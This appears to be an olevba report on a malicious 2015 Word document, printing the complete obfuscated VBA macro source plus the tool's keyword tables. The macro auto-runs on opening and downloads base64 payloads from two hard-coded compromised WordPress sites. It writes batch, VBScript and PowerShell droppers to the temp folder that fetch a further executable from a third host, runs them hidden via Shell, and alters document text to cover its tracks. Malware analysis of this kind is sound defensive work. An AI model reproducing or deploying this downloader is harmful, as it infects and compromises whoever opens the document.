Malicious Word macro

1. olevba 0.26 - http://decalage.info/python/oletools
2. Flags       Filename                                                        
3. ----------- -----------------------------------------------------------------
4. OLE:MAS-HB- 2015_M~1.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: 2015_M~1.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: 2015_M~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15.  
16.  Sub Bbhqjbjdqjwbh_Open()
17.      
18. End Sub
19. Sub Bbhqwbdhjqww_Open()
20.      
21. End Sub
22. Sub Auto_Open()
23.     Klaksdjkqw
24. End Sub
25. Sub Klaksdjkqw()
26.     QHJKDKQWJHD = "j12 hejh1k2jhe 21jk"
27.     Wjqidlkqjwd
28. End Sub
29. Sub Giqjwdhqwkjq()
30.     BHQJDWQD = "2hegjh2g 1jheg 21"
31. End Sub
32. Sub AutoOpen()
33.     NJBDHQJWBDWQ = "jh2eh k2j1hjk1he"
34.     Klaksdjkqw
35. End Sub
36.  
37. Sub Workbook_Open()
38.     BYQGDYUQWGD = "hg2 ehj12g1kjeh12kek "
39.     Auto_Open
40. End Sub
41.  
42. Sub Wjqidlkqjwd()
43.  
44.    
45.     Dim fallout As Integer, silkroad As Integer, inclife As Integer
46.     Dim hnquhdjincinc As Integer
47.     Dim retVal As Variant, gana As Integer, incturakk As Integer, kaladd As Integer, BWBBNS As String, KOLYHDN As String
48.     KOLYHDN = Chr(90 + 2)
49.    
50.    
51.     ANGOLA = Ubqhwdhwqbd(16137) + ""
52.     BWBBNS = Chr(84) & "em" + "p"
53.     QHDQUWH = ANGOLA
54.     FL2 = QHDQUWH
55.     PH2 = Module2.Goabc(BWBBNS) + KOLYHDN
56.    
57.     silkroad = 9
58.     jwnqdw = -1
59.    
60.     BOSNIA = 8719723
61.     BOSNIA = 1 + 1 + 113 + Sgn(jwnqdw)
62.     BALAGAN = BOSNIA
63.    
64.  
65.     JWIDJIAAA = ""
66.     QIWJDABB = "b"
67.     HUYFEA = QIWJDABB + "a" + "t"
68.     PSFL = FL2 + "" & "" + "." + "p" + "" + Chr(115) + Chr(49)
69.    
70.     gana = NUqwdqwbdsad(1 - 300 * Sin(20))
71.     SSS = Chr(BALAGAN + 2 + gana)
72.     VBFL = FL2 + Chr(50 - 4) + Chr(118) & "b" & "" & SSS & ""
73.     BAFL = FL2 + Chr(NUqwdqwbdsad(Fix(-22.043)) + 31 - 10 + 25 + gana + 2) + HUYFEA
74.    
75.     INTG = "" & "o" & "bject"
76.     KIWD = Chr(110 + NUqwdqwbdsad(Len(BAFL))) + "dule"
77.     AFTG = Chr(109) & KIWD
78.    
79.     SXEE = ""
80.     SXAA = Chr(101)
81.     SXE = SXEE & SXAA & "" & "xe"
82.      SXE = "." + SXE
83.     GNG = ".j" & "pg"
84.    
85.    
86.    
87.     HUQD = Chr(30 + 16 + 1)
88.     ATTH = "http" & "://"
89.     BQHJDQ = "sa" + "vep" + "ic" & Chr(46) & "su" + HUQD
90.      
91.     PSPTH = PH2 + PSFL
92.     VBPTH = PH2 + VBFL
93.     BAPTH = "j12g eh12ghje f12gh"
94.     ABPTH = PH2 + BAFL
95.     BAPTH = ABPTH
96.     JHQKWDQAASS = BQHJDQ
97.    
98.     Dim BALAGANHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer, CONT As String
99.    
100.     DRT = 315
101.     BFT = 316
102.     CFT = 317
103.     DFT = 318
104.     EFT = 319
105.     Dim NUWDHUQHUQWDH As String
106.     NUWDHUQHUQWDH = "" + "USE" & "RPROFILE"
107.     Dim PBIn As String, asdwq As String, MIWDWQ As String
108.    
109.    
110.    
111.     TSTS = "." + "tx" + "t"
112.     CDDD = "78672738612836" + TSTS
113.     LNSS = "f" & "a" & "f" & "a" & "" + TSTS
114.     STT1 = "vinestreetfilms.com/w" + "p-con" + "tent/plu" + "gins/j" + "etpa" + "ck/_inc/gene" + "ricons/gen" + "ericons/rtl/"
115.     STT2 = "midlandspestcontrol.net/w" + "p-inc" + "ludes/js/tin" + "ymce/th" + "emes/adv" + "anced/sk" + "ins/o2k7/"
116.  
117.  
118.     PBIn = ATTH + STT1 + CDDD
119.     CONT = Module2.Linolium(PBIn)
120.      
121.     asdwq = Rasdas(CONT)
122.    
123.     HQUWDAAA = "0"
124.     If (asdwq <> "=") Then
125.         PBIn = ATTH + STT2 + CDDD
126.         CONT = Module2.Linolium(PBIn)
127.         asdwq = CONT
128.         HQUWDAAA = "1"
129.     End If
130.    
131.     CONT = Quqhwdbyas(asdwq)
132.      
133.     Dim ahuywdgqy As String
134.      
135.     TVT10 = Port(CONT, "t" & "ext10")
136.     TVT20 = Port(CONT, "t" & "ext20")
137.     TVT21 = Port(CONT, "t" & "ext21")
138.     TVT30 = Port(CONT, "t" & "ext30")
139.     TVT31 = Port(CONT, "t" & "ext31")
140.     XPT1 = Port(CONT, "stext1")
141.     XPT2 = Port(CONT, "stext2")
142.     XPT3 = Port(CONT, "stext3")
143.    
144.    
145.     WVR = Module2.Goabc(NUWDHUQHUQWDH)
146.     hufehu1 = InStr(WVR, "sers\")
147.    
148.     Dim hudhw As Integer
149.     Dim ghdAdd(1 To 3)
150.     ghdAdd(1) = "1"
151.     ghdAdd(2) = "0"
152.     ghdAdd(3) = "0"
153.    
154.     If (hufehu1 <> 0) Then
155.         ghdAdd(1) = "2"
156.     Else
157.         ghdAdd(2) = "3"
158.     End If
159.  
160.  
161.     JHWQUD = Join(ghdAdd)
162.     hudhw = Val(JHWQUD)
163.    
164.     Module2.Crispy (1)
165.    
166.     MIWDWQ = ATTH + STT1 + LNSS
167.     If (HQUWDAAA = "1") Then
168.         MIWDWQ = ATTH + STT2 + LNSS
169.     End If
170.    
171.     SEXX = Module2.Linolium(MIWDWQ)
172.    
173.     PSTB = PBIn + "123123123"
174.     MSTAR1 = JHQKWDQAASS + "5751812" + GNG
175.     MSTAR2 = JHQKWDQAASS + "5757956" + GNG
176.     STAR1 = ATTH + MSTAR1
177.     STAR2 = ATTH + MSTAR2
178.     FFQ = "8"
179.     FF = FFQ + SXE
180.    
181.      If (hudhw = 130) Then
182.      Open BAPTH For Output As #DRT
183.      Print #DRT, XPT1
184.      Print #DRT, ":jadkjasghdjasg" & vbCrLf & "set trfd=" + Chr(34) + PH2 + Chr(34)
185.      Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
186.      Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
187.      Print #DRT, XPT2
188.      Close #DRT
189.      
190.      Module2.Crispy (1)
191.      
192.      Open VBPTH For Output As #BFT
193.      Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
194.      Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
195.      Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
196.      Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
197.      Print #BFT, XPT3
198.      Close #BFT
199.      
200.      BDDT.Crispy (1)
201.      NTH1 = Module3.HowEver(retVal, BAPTH)
202.      
203.      End If
204.      
205.      
206.      HUDQG = "';"
207.      
208.      
209.      
210.       If (hudhw = 200) Then
211.        
212.      ZPQSKD = FL2
213.      Open PSPTH For Output As #CFT
214.      Print #CFT, "$bhjdgqwdg = 'qbwdjhqbwgd';"
215.      Print #CFT, "$bqhdwjqwdd = 'njqdhjqwdqj';"
216.      Print #CFT, "$stat = 'ht'+'tp://'+''+'" + MSTAR2 + "';"
217.      Print #CFT, "$ggtt = '" + SEXX + "';"
218.      Print #CFT, "$pths = '" + PH2 + HUDQG
219.      
220.      Print #CFT, "$wehs = '" + ZPQSKD + HUDQG
221.      Print #CFT, "$nnm = '" + FFQ + "';"
222.      Print #CFT, TVT10
223.      Close #CFT
224.      
225.      Open VBPTH For Output As #DFT
226.      Print #DFT, TVT30
227.      Print #DFT, "c" + "urrentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&huih"
228.      Print #DFT, TVT31
229.      Close #DFT
230.    
231.      Open BAPTH For Output As #EFT
232.      Print #EFT, Chr(30 + 30 + 4) + "echo off" & vbCrLf & ":jqduqihdjsakd"
233.      Print #EFT, TVT20
234.      Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
235.      Print #EFT, ":hdjqkwhdqhwd"
236.      Print #EFT, "set Mts4=" + Chr(34) + PH2 + Chr(34)
237.      Print #EFT, ":ajhsdkasghjgsd"
238.      Print #EFT, "set Rts4=" + "%Mts4%%Ads3%"
239.      Print #EFT, TVT21
240.      Close #EFT
241.      Module2.Crispy (1)
242.      
243.      NTH2 = Module3.HowEver(retVal, BAPTH)
244.      
245.      End If
246.      
247.     JUW = Chr(47)
248.     AKK = Chr(60)
249.     ZKK = ">"
250.     NTH3 = Module3.India(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
251.     NTH4 = Module3.India(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
252.     NTH5 = Module3.India(AKK + INTG + ZKK, "", 3)
253.     NTH6 = Module3.India(AKK + JUW + INTG + ZKK, "", 3)
254.     NTH7 = Module3.India(AKK + AFTG + ZKK, "", 3)
255.     NTH8 = Module3.India(AKK + JUW + AFTG + ZKK, "", 3)
256.    
257. End Sub
258.  
259.  
260. Public Function NUqwdqwbdsad(a As Integer)
261. NUqwdqwbdsad = Sgn(a)
262. End Function
263.  
264. Public Function Hhqudhqwgyuqwaaa(a As Integer)
265. Hhqudhqwgyuqwaaa = Sgn(a)
266. End Function
267.  
268. Public Function Ubqhwdhwqbd(a As Integer)
269. Ubqhwdhwqbd = CStr(Int((a * Rnd) + 10000))
270. End Function
271.  
272.  
273. Public Function Quqhwdbyas(ByVal strData As String) As String
274.     Dim objXML As Object
275.     Dim objNode As Object
276.     Dim asduiwhqdqiw As Integer, nudqwd As Integer, sshquwdq As Integer
277.     nudqwd = Tan(12)
278.     'MsgBox ("tangens:" + nudqwd)
279.    asduiwhqdqiw = Hhqudhqwgyuqwaaa(nudqwd)
280.     QHDHUQW = "" & Chr(78 + asduiwhqdqiw) + "SXML2.DOMDocument"
281.     Set objXML = CreateObject(QHDHUQW)
282.     Set objNode = objXML.createElement("b6" + "4")
283.     objNodeS = "j1h2 ehgj12hj12 ejg12e1"
284.     objNodeE = "g21eh1"
285.     objNodeQ = "1j2ge h12"
286.     objNodeZ = "dbjsahs "
287.     objNode.DataType = "bin.b" + Chr(97) + "se" + "6" & "4"
288.     objNode.Text = strData
289.     WUDHA = objNode.nodeTypedValue
290.     Quqhwdbyas = WUDHA
291.     Set objNode = Nothing
292.     Set objXML = Nothing
293. End Function
294.  
295. Public Function Port(a, b As String)
296. Dim krd, tent As Integer
297. UQWD = Chr(50 + 8 + 2) & ""
298. NDUW = "" & Chr(70 - 8)
299. krd = InStr(1, a, UQWD + b + NDUW) + 8
300. tent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
301. KLMN = Mid$(a, krd, tent)
302. HUQHWDA = KLMN
303. Port = HUQHWDA
304. End Function
305.  
306.  
307.  
308. Private Static Function Rasdas(a As String)
309. Rasdas = Right(a, 1)
310. End Function
311.  
312.  
313.  
314.  
315.  
316.  
317.  
318. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
319. ANALYSIS:
320. +------------+----------------+-----------------------------------------+
321. | Type       | Keyword        | Description                             |
322. +------------+----------------+-----------------------------------------+
323. | AutoExec   | AutoOpen       | Runs when the Word document is opened   |
324. | AutoExec   | Auto_Open      | Runs when the Excel Workbook is opened  |
325. | AutoExec   | Workbook_Open  | Runs when the Excel Workbook is opened  |
326. | Suspicious | Open           | May open a file                         |
327. | Suspicious | Chr            | May attempt to obfuscate specific       |
328. |            |                | strings                                 |
329. | Suspicious | CreateObject   | May create an OLE object                |
330. | Suspicious | Output         | May write to a file (if combined with   |
331. |            |                | Open)                                   |
332. | Suspicious | Print #        | May write to a file (if combined with   |
333. |            |                | Open)                                   |
334. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
335. |            |                | be used to obfuscate strings (option    |
336. |            |                | --decode to see all)                    |
337. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
338. |            |                | may be used to obfuscate strings        |
339. |            |                | (option --decode to see all)            |
340. +------------+----------------+-----------------------------------------+
341. -------------------------------------------------------------------------------
342. VBA MACRO Module1.bas
343. in file: 2015_M~1.doc - OLE stream: u'Macros/VBA/Module1'
344. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
345. Public Function Xjdkhjfwefw(a As Object)
346. Xjdkhjfwefw = (a.responseText)
347. End Function
348.  
349.  
350.  
351. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
352. ANALYSIS:
353. No suspicious keyword or IOC found.
354. -------------------------------------------------------------------------------
355. VBA MACRO Module2.bas
356. in file: 2015_M~1.doc - OLE stream: u'Macros/VBA/Module2'
357. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
358.  
359. Public Function Goabc(sps As String)
360. NJKQWHDJKWQ = "h2ejk 12ehh1jge j12gehj1"
361. NJKQWHDJKWQ = "h2ejk 12ehh1jge j12gehj1"
362. NJKQWHDJKWQ = "h2ejk 12ehh1jge j12gehj1"
363. Goabc = Environ(sps)
364. End Function
365. Public Function Linolium(nbqjbdjqw As String)
366. Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, Kjqiwdhqwuhdjqkwhdjkqwbd As Object, AHUDWQI As String
367. Dim ashdUHhda As String, hausd As Integer
368. ashdUHhda = nbqjbdjqw
369. hausd = Tan(12)
370. BQDHJQWDGWQJGS = "MS" + Chr(93 + 5 * hausd) + "ML2.ServerXMLH" & Chr(85 + hausd) & Chr(84) & Chr(80)
371. 'MsgBox (BQDHJQWDGWQJGS)
372. Set Kjqiwdhqwuhdjqkwhdjkqwbd = CreateObject(BQDHJQWDGWQJGS)
373. Kjqiwdhqwuhdjqkwhdjkqwbd.Open "GE" & "" & "T", ashdUHhda
374. Kjqiwdhqwuhdjqkwhdjkqwbd.Send (AHUDWQI)
375. Linolium = Module1.Xjdkhjfwefw(Kjqiwdhqwuhdjqkwhdjkqwbd)
376. End Function
377. Sub Crispy(NumOfSeconds As Long)
378. Dim SngSec As Long
379. SngSec = Timer + NumOfSeconds
380. Do While Timer < SngSec
381. DoEvents
382. Loop
383. End Sub
384.  
385.  
386.  
387.  
388.  
389.  
390. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
391. ANALYSIS:
392. +------------+--------------+-----------------------------------------+
393. | Type       | Keyword      | Description                             |
394. +------------+--------------+-----------------------------------------+
395. | Suspicious | Open         | May open a file                         |
396. | Suspicious | Chr          | May attempt to obfuscate specific       |
397. |            |              | strings                                 |
398. | Suspicious | CreateObject | May create an OLE object                |
399. | Suspicious | Environ      | May read system environment variables   |
400. +------------+--------------+-----------------------------------------+
401. -------------------------------------------------------------------------------
402. VBA MACRO Module3.bas
403. in file: 2015_M~1.doc - OLE stream: u'Macros/VBA/Module3'
404. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
405.  
406. Public Function India(dnuwhd As String, b As String, c As Integer)
407. Dim kelTefjsd As String
408. NJQKWNDJWQD = "2k3h kr23kj23h rkj23 ghrj32g wlijflsdkj flkj sdlkjfwhfe"
409. NJQKWNDJWQD = "2k3h kr23kj23h rkj23 ghrj32g wlijflsdkj flkj sdlkjfwhfe"
410. Dim ttrejiojfsdlkjfkldjhetttjshkfjdsh As Range, behjasdbhjsajdgqhjwgdq As Range
411. Set ttrejiojfsdlkjfkldjhetttjshkfjdsh = ActiveDocument.Range
412. NJQKWNDJWQD = "2k3h kr23kj23h rkj23 ghrj32g wlijflsdkj flkj sdlkjfwhfe"
413. NJQKWNDJWQD = "2k3h kr23kj23h rkj23 ghrj32g wlijflsdkj flkj sdlkjfwhfe"
414. With ttrejiojfsdlkjfkldjhetttjshkfjdsh.Find
415. 'NJQKWNDJWQD = "2k3h kr23kj23h rkj23 ghrj32g wlijflsdkj flkj sdlkjfwhfe"
416. 'NJQKWNDJWQD = "2k3h kr23kj23h rkj23 ghrj32g wlijflsdkj flkj sdlkjfwhfe"
417. .Text = dnuwhd
418. .MatchWholeWord = True
419. ttrejiojfsdlkjfkldjhetttjshkfjdsh.Find.Execute
420. ttrejiojfsdlkjfkldjhetttjshkfjdsh.Collapse direction:=wdCollapseEnd
421. Dim wdwq As String
422. Set behjasdbhjsajdgqhjwgdq = ActiveDocument.Range
423. Dim wdsadwq As String
424. behjasdbhjsajdgqhjwgdq.Start = ttrejiojfsdlkjfkldjhetttjshkfjdsh.End
425. .Text = b
426. .MatchWholeWord = True
427. .Execute
428. NJQKWNDJWQD = "2k3h kr23kj23h rkj23 ghrj32g wlijflsdkj flkj sdlkjfwhfe"
429. NJQKWNDJWQD = "2k3h kr23kj23h rkj23 ghrj32g wlijflsdkj flkj sdlkjfwhfe"
430. ttrejiojfsdlkjfkldjhetttjshkfjdsh.Collapse direction:=wdCollapseStart
431. behjasdbhjsajdgqhjwgdq.End = ttrejiojfsdlkjfkldjhetttjshkfjdsh.Start
432.  
433. If (c = 1) Then
434.     kelTefjsd = behjasdbhjsajdgqhjwgdq.Delete
435. End If
436. If (c = 2) Then
437.     behjasdbhjsajdgqhjwgdq.Font.Color = wdColorBlack
438. End If
439.  
440. Dim hduwaa As Integer
441. hduwaa = 1 - 2 ^ 4
442.  
443. QHUDW = Chr(10 + 23 + Sgn(hduwaa))
444.  
445. If (c = 3) Then
446.     With ttrejiojfsdlkjfkldjhetttjshkfjdsh.Find
447.     .Text = a
448.     .Replacement.Text = QHUDW
449.     'NJQKWNDJWQD = "2k3h kr23kj23h rkj23 ghrj32g wlijflsdkj flkj sdlkjfwhfe"
450.    'NJQKWNDJWQD = "2k3h kr23kj23h rkj23 ghrj32g wlijflsdkj flkj sdlkjfwhfe"
451.    'NJQKWNDJWQD = "2k3h kr23kj23h rkj23 ghrj32g wlijflsdkj flkj sdlkjfwhfe"
452.    'NJQKWNDJWQD = "2k3h kr23kj23h rkj23 ghrj32g wlijflsdkj flkj sdlkjfwhfe"
453.    .Wrap = wdFindContinue
454.     .Execute Replace:=wdReplaceAll
455.     End With
456. End If
457.  
458. End With
459. End Function
460.  
461. Public Function HowEver(hqwdugqw As Variant, hasdgja)
462. NJBDW = "wndm 21jhjg21 21"
463. hqwdugqw = Shell(hasdgja, 0)
464. HowEver = hqwdugqw
465. End Function
466.  
467.  
468.  
469.  
470.  
471.  
472.  
473.  
474.  
475.  
476.  
477.  
478.  
479.  
480.  
481.  
482.  
483.  
484. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
485. ANALYSIS:
486. +------------+---------+-----------------------------------------+
487. | Type       | Keyword | Description                             |
488. +------------+---------+-----------------------------------------+
489. | Suspicious | Chr     | May attempt to obfuscate specific       |
490. |            |         | strings                                 |
491. | Suspicious | Shell   | May run an executable file or a system  |
492. |            |         | command                                 |
493. +------------+---------+-----------------------------------------+